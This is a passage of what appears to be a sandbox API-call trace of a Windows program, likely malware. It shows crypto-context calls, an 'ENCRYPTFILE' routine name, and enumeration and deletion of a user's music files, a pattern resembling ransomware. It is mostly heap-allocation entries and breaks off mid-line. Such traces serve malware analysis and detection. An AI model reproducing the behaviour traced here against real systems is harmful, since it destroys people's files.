0x13 [0117.383] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.383] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.383] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.383] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.383] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.383] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0117.383] CryptReleaseContext (hProv=0x41a4508, dwFlags=0x0) returned 1 [0117.383] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.383] FreeLibrary (hLibModule=0x756e0000) returned 1 [0117.383] CloseHandle (hObject=0x298) returned 1 [0117.383] CloseHandle (hObject=0x258) returned 1 [0117.385] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\Glkh.mp3", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\Glkh.mp3", lpFilePart=0x0) returned 0x4a [0117.385] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\Glkh.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq\\glkh.mp3")) returned 0x20 [0117.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0117.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0117.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.386] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\Glkh.mp3", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542d010, ftCreationTime.dwHighDateTime=0x1d5efed, ftLastAccessTime.dwLowDateTime=0x1323e620, ftLastAccessTime.dwHighDateTime=0x1d5e37b, ftLastWriteTime.dwLowDateTime=0x1323e620, ftLastWriteTime.dwHighDateTime=0x1d5e37b, nFileSizeHigh=0x0, nFileSizeLow=0x65cf, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Glkh.mp3", cAlternateFileName="")) returned 0x41ac640 [0117.386] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\Glkh.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq\\glkh.mp3")) returned 1 [0117.389] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542d010, ftCreationTime.dwHighDateTime=0x1d5efed, ftLastAccessTime.dwLowDateTime=0x1323e620, ftLastAccessTime.dwHighDateTime=0x1d5e37b, ftLastWriteTime.dwLowDateTime=0x1323e620, ftLastWriteTime.dwHighDateTime=0x1d5e37b, nFileSizeHigh=0x0, nFileSizeLow=0x65cf, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Glkh.mp3", cAlternateFileName="")) returned 0 [0117.389] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7a58 | out: hHeap=0x1780000) returned 1 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0117.389] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0117.389] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0117.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0117.390] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.390] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0117.390] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0117.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0117.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0117.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0117.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x130) returned 0x43cc1c8 [0117.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0117.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0117.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0117.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0117.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0117.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0117.391] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0117.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.399] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0117.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.399] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\ymTK.m4a", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b87d480, ftCreationTime.dwHighDateTime=0x1d5e0cf, ftLastAccessTime.dwLowDateTime=0xf027b580, ftLastAccessTime.dwHighDateTime=0x1d5e63f, ftLastWriteTime.dwLowDateTime=0xf027b580, ftLastWriteTime.dwHighDateTime=0x1d5e63f, nFileSizeHigh=0x0, nFileSizeLow=0x11773, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="ymTK.m4a", cAlternateFileName="")) returned 0x41ac600 [0117.400] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0117.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0117.400] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0117.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0117.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0117.401] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0117.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0117.401] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0117.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0117.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0117.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0117.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0117.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0117.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0117.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0117.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0117.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0117.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0117.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0117.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0117.403] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0117.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: 